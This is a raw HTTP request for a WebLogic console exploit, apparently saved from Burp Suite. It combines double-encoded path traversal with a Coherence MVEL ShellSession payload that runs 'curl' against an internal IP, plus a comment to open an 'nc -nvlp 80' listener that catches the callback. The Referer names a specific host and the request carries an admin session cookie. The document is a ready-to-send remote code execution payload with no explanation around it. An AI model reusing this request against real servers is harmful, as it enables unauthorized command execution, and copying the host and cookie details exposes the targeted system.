POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: HOST:PORT
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://vafscappfos401a.aac.dva.va.gov:32210/console/images/%252E%252E%252Fconsole.portal
Cookie: ADMINCONSOLESESSION=vHAFF5NldCEfrCfb2qudMXK31E5wkLERzamMxbVvYz2WGvL1Uvja!743674651
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

_nfpb=false&amp;_pageLabel=HomePage1&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec("curl http://10.219.105.42:80");")

# start a listener on your machine before sending in burp
nc -nvlp 80
